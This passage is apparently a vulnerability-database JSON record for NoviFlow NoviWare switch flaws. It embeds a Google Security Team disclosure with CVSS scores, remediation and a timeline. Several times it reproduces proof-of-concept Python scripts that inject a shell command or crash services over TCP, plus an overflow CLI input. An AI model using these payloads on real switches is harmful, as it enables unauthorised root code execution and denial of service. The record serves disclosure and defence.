"id": "CNVD-2017-29534",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2017-12787",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-12787",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2017-12787",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2017-29534",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201708-457",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2017-12787",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-29534"
},
{
"db": "VULMON",
"id": "CVE-2017-12787"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007315"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-457"
},
{
"db": "NVD",
"id": "CVE-2017-12787"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A network interface of the novi_process_manager_daemon service, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because incoming packet data can contain embedded OS commands, and can also trigger a stack-based buffer overflow. NoviWare Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. NoviFlowNoviWare and NoviSwitchdevices are products of NoviFlow Canada. NoviSwitchdevices is a series of switch devices. NoviWare is the switch software used in it. NoviFlowNoviWareNW400.2.6 and previous versions and noviSwitch devices have a security vulnerability in the network interface of novi_process_manager_daemon. A remote attacker could exploit the vulnerability to execute code with root privileges. NoviFlow NoviWare \u003c= NW400.2.6 multiple vulnerabilities\n\n\nIntroduction\n==========\nNoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant\nswitch software developed by NoviFlow and available for license to\nnetwork equipment manufacturers. \nMultiple vulnerabilities were identified in the NoviWare software\ndeployed on NoviSwitch devices. \n\n\nCVEs\n=====\n* CVE-2017-12784: remote code execution in novi_process_manager_daemon\nIndicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\n\n* CVE-2017-12785: cli breakout in novish\nIndicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)\n\n* CVE-2017-12786: remote code execution in noviengine and cliengine\nIndicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\n\n\nAffected versions\n==============\nNoviWare \u003c= NW400.2.6 and devices where a vulnerable NoviWare version\nis deployed\n\n\nAuthor\n======\nFranASSois Goichon - Google Security Team\n\n\nCVE-2017-12784\n==============\nRemote code execution in novi_process_manager_daemon\n\nSummary\n-------------\nThe NoviWare switching software distribution is prone to two distinct\nbugs which could potentially allow a remote, unauthenticated attacker\nto gain privileged (root) code execution on the switch device. \n- A flaw when applying ACL changes requested from the CLI could expose\nthe novi_process_manager_daemon network service\n- This network service is prone to command injection and a stack-based\nbuffer overflow\n\nReproduction\n------------------\nIf TCP port 2020 is accepting connections from the network, the\nfollowing python script can be used to ping yourself on vulnerable\nversions :\n---\nfrom struct import pack\nimport socket\n\ns = socket.socket()\ns.connect((\u003cswitch host\u003e, 2020))\n\npayload = pack(\"\u003cI\", 0xffffffff).ljust(0x24) + \"ping \u003cyour ip\u003e; echo\\x00\"\ns.sendall(pack(\"\u003cII\", 1, len(payload)+8))\ns.sendall(payload)\n\ns.close()\n---\n\nOn vulnerable versions, the appliance will perform an ICMP request to\nthe specified IP, which can be observed in network logs. \n\nRemediation\n-----------------\n- Upgrade to NoviWare400 3.0 or later. \n- NoviFlow customers should have received instructions on how to get\nthe latest release along with release notes. For more information,\ncontact support@noviflow.com. \n\n\nCVE-2017-12785\n==============\nCli breakout in novish\n\nSummary\n-------------\nThe NoviWare switching software distribution is prone to a buffer\noverflow and a command injection, allowing authenticated,\nlow-privileged users to break out of the CLI and execute commands as\nroot. \n\nReproduction\n------------------\nLog in to the appliance via SSH and run the following command from the CLI:\n--\nnoviswitch# show log cli username\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n--\n\nIf the appliance is vulnerable, the cli crashes and the session ends. \n\nRemediation\n-----------------\n- Upgrade to NoviWare400 3.0 or later. \n- NoviFlow customers should have received instructions on how to get\nthe latest release along with release notes. For more information,\ncontact support@noviflow.com. \n- A flaw when applying ACL changes requested from the CLI could expose\nnoviengine and cliengine network services\n- These network services are prone to a stack-based buffer overflow\nwhen unpacking serialized values. \n\nReproduction\n------------------\nIf TCP ports 9090 or 12345 are accepting connections from the network,\nthe following python script can be used to cause a crash on vulnerable\nversions :\n---\nfrom struct import pack\nimport socket\n\ns = socket.socket()\ns.connect((\u003cswitch host\u003e, \u003c9090 or 12345\u003e))\n\npayload = \"\".join([pack(\"\u003cI\", 4) + \"AAAA\" for i in xrange(408)])\npayload = pack(\"\u003cIIQ\", 0, len(payload) + 16, 0) + payload\ns.sendall(payload)\n\ns.read(1)\ns.close()\n---\n\nA watchdog should restart the service if it has crashed. \n\nRemediation\n-----------------\n- Upgrade to NoviWare400 3.0 or later. \n- NoviFlow customers should have received instructions on how to get\nthe latest release along with release notes. For more information,\ncontact support@noviflow.com. \n\n\nDisclosure timeline\n===============\n2017/05/11 - Report sent to NoviFlow\n2017/05/26 - Bugs acknowledged and remediation timeline confirmed\n2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities\n2017/08/09 - CVE requests\n2017/08/16 - Public disclosure\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12787"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007315"
},
{
"db": "CNVD",
"id": "CNVD-2017-29534"
},
{
"db": "VULMON",
"id": "CVE-2017-12787"
},
{
"db": "PACKETSTORM",
"id": "143818"
}
],
"trust": 2.34
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=42518",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-12787"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-12787",
"trust": 3.2
},
{
"db": "EXPLOIT-DB",
"id": "42518",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007315",
"trust": 0.8
},
{
"db": "EXPLOITDB",
"id": "42518",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2017-29534",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201708-457",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2017-12787",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "143818",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-29534"
},
{
"db": "VULMON",
"id": "CVE-2017-12787"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007315"
},
{
"db": "PACKETSTORM",
"id": "143818"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-457"
},
{
"db": "NVD",
"id": "CVE-2017-12787"
}
]
},
"id": "VAR-201708-1147",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-29534"
}
],
"trust": 0.92692307
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-29534"
}
]
},
"last_update_date": "2025-04-20T23:04:26.294000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "NoviWare",
"trust": 0.8,
"url": "https://noviflow.com/products/noviware/"
},
{
"title": "Patch for NoviFlowNoviWare and NoviSwitch device remote code execution vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/103387"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-29534"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007315"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-007315"
},
{
"db": "NVD",
"id": "CVE-2017-12787"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.exploit-db.com/exploits/42518/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12787"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12787"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12785"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12786"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-29534"
},
{
"db": "VULMON",
"id": "CVE-2017-12787"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007315"
},
{
"db": "PACKETSTORM",
"id": "143818"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-457"
},
{
"db": "NVD",
"id": "CVE-2017-12787"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-29534"
},
{
"db": "VULMON",
"id": "CVE-2017-12787"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007315"
},
{
"db": "PACKETSTORM",
"id": "143818"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-457"
},
{
"db": "NVD",
"id": "CVE-2017-12787"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-29534"
},
{
"date": "2017-08-22T00:00:00",
"db": "VULMON",
"id": "CVE-2017-12787"
},
{
"date": "2017-09-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-007315"
},
{
"date": "2017-08-18T23:44:44",
"db": "PACKETSTORM",
"id": "143818"
},
{
"date": "2017-08-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201708-457"
},
{
"date": "2017-08-22T17:29:00.270000",
"db": "NVD",
"id": "CVE-2017-12787"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-29534"
},
{
"date": "2017-08-29T00:00:00",
"db": "VULMON",
"id": "CVE-2017-12787"
},
{
"date": "2017-09-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-007315"
},
{
"date": "2017-08-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201708-457"
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2017-12787"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201708-457"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "NoviWare Buffer error vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-007315"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201708-457"
}
],
"trust": 0.6
}
}
VAR-201708-1146
Vulnerability from variot - Updated: 2025-04-20 23:04Network interfaces of the cliengine and noviengine services, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because there is a stack-based buffer overflow during unserialization of packet data. NoviWare Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. NoviFlowNoviWare and NoviSwitchdevices are products of NoviFlow Canada. NoviSwitchdevices is a series of switch devices. NoviWare is the switch software used in it. A stack buffer overflow vulnerability exists in the NoviFlowNoviWareNW400.2.6 and earlier versions and the Network interface for the cliengine and noviengine services in the NoviSwitch device. A remote attacker could exploit the vulnerability to execute code with root privileges. NoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities
Introduction
NoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant switch software developed by NoviFlow and available for license to network equipment manufacturers. Multiple vulnerabilities were identified in the NoviWare software deployed on NoviSwitch devices.
CVEs
-
CVE-2017-12784: remote code execution in novi_process_manager_daemon Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
-
CVE-2017-12785: cli breakout in novish Indicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)
-
CVE-2017-12786: remote code execution in noviengine and cliengine Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Affected versions
NoviWare <= NW400.2.6 and devices where a vulnerable NoviWare version is deployed
Author
FranASSois Goichon - Google Security Team
CVE-2017-12784
Remote code execution in novi_process_manager_daemon
Summary
The NoviWare switching software distribution is prone to two distinct bugs which could potentially allow a remote, unauthenticated attacker to gain privileged (root) code execution on the switch device. - A flaw when applying ACL changes requested from the CLI could expose the novi_process_manager_daemon network service - This network service is prone to command injection and a stack-based buffer overflow
Reproduction
If TCP port 2020 is accepting connections from the network, the following python script can be used to ping yourself on vulnerable versions :
from struct import pack import socket
s = socket.socket() s.connect((, 2020))
payload = pack("<I", 0xffffffff).ljust(0x24) + "ping ; echo\x00" s.sendall(pack("<II", 1, len(payload)+8)) s.sendall(payload)
s.close()
On vulnerable versions, the appliance will perform an ICMP request to the specified IP, which can be observed in network logs.
Remediation
- Upgrade to NoviWare400 3.0 or later.
- NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.
CVE-2017-12785
Cli breakout in novish
Summary
The NoviWare switching software distribution is prone to a buffer overflow and a command injection, allowing authenticated, low-privileged users to break out of the CLI and execute commands as root.
Reproduction
Log in to the appliance via SSH and run the following command from the CLI:
noviswitch# show log cli username AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA --
If the appliance is vulnerable, the cli crashes and the session ends.
Remediation
- Upgrade to NoviWare400 3.0 or later.
- NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.
- A flaw when applying ACL changes requested from the CLI could expose noviengine and cliengine network services
- These network services are prone to a stack-based buffer overflow when unpacking serialized values.
Reproduction
If TCP ports 9090 or 12345 are accepting connections from the network, the following python script can be used to cause a crash on vulnerable versions :
from struct import pack import socket
s = socket.socket() s.connect((, <9090 or 12345>))
payload = "".join([pack("<I", 4) + "AAAA" for i in xrange(408)]) payload = pack("<IIQ", 0, len(payload) + 16, 0) + payload s.sendall(payload)
s.read(1) s.close()
A watchdog should restart the service if it has crashed.
Remediation
- Upgrade to NoviWare400 3.0 or later.
- NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.
Disclosure timeline
2017/05/11 - Report sent to NoviFlow 2017/05/26 - Bugs acknowledged and remediation timeline confirmed 2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities 2017/08/09 - CVE requests 2017/08/16 - Public disclosure
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201708-1146",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "noviware",
"scope": "lte",
"trust": 1.0,
"vendor": "noviflow",
"version": "400.2.6"
},
{
"model": "noviware",
"scope": "lte",
"trust": 0.8,
"vendor": "noviflow",
"version": "nw400.2.6"
},
{
"model": "noviware \u003c=nw400.2.6",
"scope": null,
"trust": 0.6,
"vendor": "noviflow",
"version": null
},
{
"model": "noviware",
"scope": "eq",
"trust": 0.6,
"vendor": "noviflow",
"version": "400.2.6"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-29532"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007314"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-458"
},
{
"db": "NVD",
"id": "CVE-2017-12786"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:noviflow:noviware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-007314"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Francois Goichon",
"sources": [
{
"db": "PACKETSTORM",
"id": "143818"
}
],
"trust": 0.1
},
"cve": "CVE-2017-12786",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2017-12786",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2017-29532",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2017-12786",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-12786",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2017-12786",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2017-29532",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201708-458",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2017-12786",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-29532"
},
{
"db": "VULMON",
"id": "CVE-2017-12786"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007314"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-458"
},
{
"db": "NVD",
"id": "CVE-2017-12786"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Network interfaces of the cliengine and noviengine services, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because there is a stack-based buffer overflow during unserialization of packet data. NoviWare Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. NoviFlowNoviWare and NoviSwitchdevices are products of NoviFlow Canada. NoviSwitchdevices is a series of switch devices. NoviWare is the switch software used in it. A stack buffer overflow vulnerability exists in the NoviFlowNoviWareNW400.2.6 and earlier versions and the Network interface for the cliengine and noviengine services in the NoviSwitch device. A remote attacker could exploit the vulnerability to execute code with root privileges. NoviFlow NoviWare \u003c= NW400.2.6 multiple vulnerabilities\n\n\nIntroduction\n==========\nNoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant\nswitch software developed by NoviFlow and available for license to\nnetwork equipment manufacturers. \nMultiple vulnerabilities were identified in the NoviWare software\ndeployed on NoviSwitch devices. \n\n\nCVEs\n=====\n* CVE-2017-12784: remote code execution in novi_process_manager_daemon\nIndicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\n\n* CVE-2017-12785: cli breakout in novish\nIndicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)\n\n* CVE-2017-12786: remote code execution in noviengine and cliengine\nIndicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\n\n\nAffected versions\n==============\nNoviWare \u003c= NW400.2.6 and devices where a vulnerable NoviWare version\nis deployed\n\n\nAuthor\n======\nFranASSois Goichon - Google Security Team\n\n\nCVE-2017-12784\n==============\nRemote code execution in novi_process_manager_daemon\n\nSummary\n-------------\nThe NoviWare switching software distribution is prone to two distinct\nbugs which could potentially allow a remote, unauthenticated attacker\nto gain privileged (root) code execution on the switch device. \n- A flaw when applying ACL changes requested from the CLI could expose\nthe novi_process_manager_daemon network service\n- This network service is prone to command injection and a stack-based\nbuffer overflow\n\nReproduction\n------------------\nIf TCP port 2020 is accepting connections from the network, the\nfollowing python script can be used to ping yourself on vulnerable\nversions :\n---\nfrom struct import pack\nimport socket\n\ns = socket.socket()\ns.connect((\u003cswitch host\u003e, 2020))\n\npayload = pack(\"\u003cI\", 0xffffffff).ljust(0x24) + \"ping \u003cyour ip\u003e; echo\\x00\"\ns.sendall(pack(\"\u003cII\", 1, len(payload)+8))\ns.sendall(payload)\n\ns.close()\n---\n\nOn vulnerable versions, the appliance will perform an ICMP request to\nthe specified IP, which can be observed in network logs. \n\nRemediation\n-----------------\n- Upgrade to NoviWare400 3.0 or later. \n- NoviFlow customers should have received instructions on how to get\nthe latest release along with release notes. For more information,\ncontact support@noviflow.com. \n\n\nCVE-2017-12785\n==============\nCli breakout in novish\n\nSummary\n-------------\nThe NoviWare switching software distribution is prone to a buffer\noverflow and a command injection, allowing authenticated,\nlow-privileged users to break out of the CLI and execute commands as\nroot. \n\nReproduction\n------------------\nLog in to the appliance via SSH and run the following command from the CLI:\n--\nnoviswitch# show log cli username\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n--\n\nIf the appliance is vulnerable, the cli crashes and the session ends. \n\nRemediation\n-----------------\n- Upgrade to NoviWare400 3.0 or later. \n- NoviFlow customers should have received instructions on how to get\nthe latest release along with release notes. For more information,\ncontact support@noviflow.com. \n- A flaw when applying ACL changes requested from the CLI could expose\nnoviengine and cliengine network services\n- These network services are prone to a stack-based buffer 